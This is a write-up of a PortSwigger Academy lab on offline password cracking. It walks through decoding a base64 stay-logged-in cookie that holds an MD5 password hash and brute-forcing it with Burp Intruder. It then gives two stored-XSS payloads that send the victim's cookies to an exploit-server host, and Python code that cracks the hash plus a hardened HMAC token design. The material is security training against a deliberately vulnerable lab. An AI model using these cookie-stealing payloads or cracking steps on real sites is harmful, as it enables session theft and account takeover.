PortSwigger Academy: Offline password cracking
Task
This lab stores the user’s password hash in a cookie. The lab also contains an XSS vulnerability in the comment functionality. To solve the lab, obtain Carlos’s stay-logged-in cookie and use it to crack his password. Then, log in as carlos and delete his account from the “My account” page.
- Your credentials: wiener:peter
- Victim’s username: carlos
Attempt
First let’s just log in to the website as usual and take a gander at the requests. Oh, there’s a “Stay logged in” option. Promising. I checked it. On the account page you can see a “Delete account” button, and this time’s goal is deleting carlos’s account using this button.
Turn on intercept and intercept the request to delete the account. (You have to drop this request, otherwise you will lose your own account, and do not send that request as the baseline request either!) Examining the request, I can see a stay-logged-in cookie and a session token. The path doesn’t specify the user, so this stay-logged-in cookie must hold the information identifying a specific user.
Since the account deletion page requires entering your password again, I chose to attack the /my-account?id= page.
I just selected that cookie value and Burp showed the base64-decoded string: wiener:51dc30ddc473d43a6011e9ebba6ca770. I guessed the second part is an MD5 hash of the password.
I tried this:
echo -n "peter" | md5sum
51dc30ddc473d43a6011e9ebba6ca770
(The -n option matters when hashing: it suppresses the trailing newline that echo would otherwise append, which would change the hash result.)
Bingo.
I added a list of passwords to Intruder, and as payload processing rules: hash with MD5, add the prefix carlos: (username and separator, matching the decoded format above), then base64-encode. The order is crucial.
I set the redirection setting to “on-site only” and added “Your username is” as a grep match expression, so I can easily tell when a login succeeds.
But none of the passwords in my list was correct.
I guess there’s no other way than stealing the cookie.
Since the blog comment section is vulnerable to stored XSS, you can set a payload that steals cookies:
<script>document.location='https://exploit-0af700d604665a5780fa6b7d01ee008a.exploit-server.net/'+document.cookie</script>
You could use a more modern payload:
<script>
fetch('https://exploit-0af700d604665a5780fa6b7d01ee008a.exploit-server.net/log?c=' + encodeURIComponent(document.cookie));
</script>
I got this:
secret=cDAWpO1SC2FjkbVSyPU8fkQ7ayw5B4xL;%20stay-logged-in=Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz
base64 decoded:
carlos:26323c16d5f4dabff3bb136f2460a943
I failed to install hashcat on my new laptop, so I used CrackStation. You should avoid using this kind of online service if you are working for a client. I got the cracked password:
onceuponatime
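As an added example (not part of the original writeup), here is the cookie format and the Intruder processing chain in Python: decode the captured cookie, rebuild it from a candidate password, run the offline dictionary check, and, for contrast, a hardened stay-logged-in token (my assumption, not the lab’s design) that is an HMAC over username and expiry under a server-side key, so a leaked cookie carries no password material. The cookie value and the wordlist are constructed from the values quoted above.

```python
from __future__ import annotations
import base64
import hashlib
import hmac

# Constructed sample: the stay-logged-in value captured in the writeup above.
CARLOS_COOKIE = "Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz"


def decode_stay_logged_in(cookie: str) -> tuple[str, str]:
    """Split the lab's cookie, base64(username:md5hex), into its two parts."""
    padded = cookie + "=" * (-len(cookie) % 4)  # tolerate stripped padding
    username, md5_hex = base64.b64decode(padded).decode().split(":", 1)
    return username, md5_hex

def build_stay_logged_in(username: str, password: str) -> str:
    """Same chain as the Intruder rules: MD5 -> prefix 'user:' -> base64."""
    md5_hex = hashlib.md5(password.encode()).hexdigest()
    return base64.b64encode(f"{username}:{md5_hex}".encode()).decode()

def crack_md5(md5_hex: str, wordlist) -> str | None:
    """Offline dictionary check: one unsalted, fast hash per candidate."""
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == md5_hex:
            return candidate
    return None

# Hardened alternative (my assumption, not the lab's design): the token is an
# HMAC over username and expiry under a server-side key, so it reveals nothing
# about the password and cannot be forged or extended without the key.
SERVER_KEY = b"constructed-server-secret"  # constructed; load from a vault in practice

def issue_token(username: str, expires_at: int, key: bytes = SERVER_KEY) -> str:
    payload = f"{username}:{expires_at}"
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return base64.b64encode(f"{payload}:{tag}".encode()).decode()

def verify_token(token: str, now: int, key: bytes = SERVER_KEY) -> str | None:
    """Return the username if the tag is valid and the token is unexpired."""
    try:
        username, exp, tag = base64.b64decode(token).decode().rsplit(":", 2)
        expires_at = int(exp)
    except ValueError:  # bad base64, wrong field count, or non-numeric expiry
        return None
    expected = hmac.new(key, f"{username}:{expires_at}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected) or expires_at < now:
        return None
    return username
```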
Deleting poor carlos’s account concludes the lab.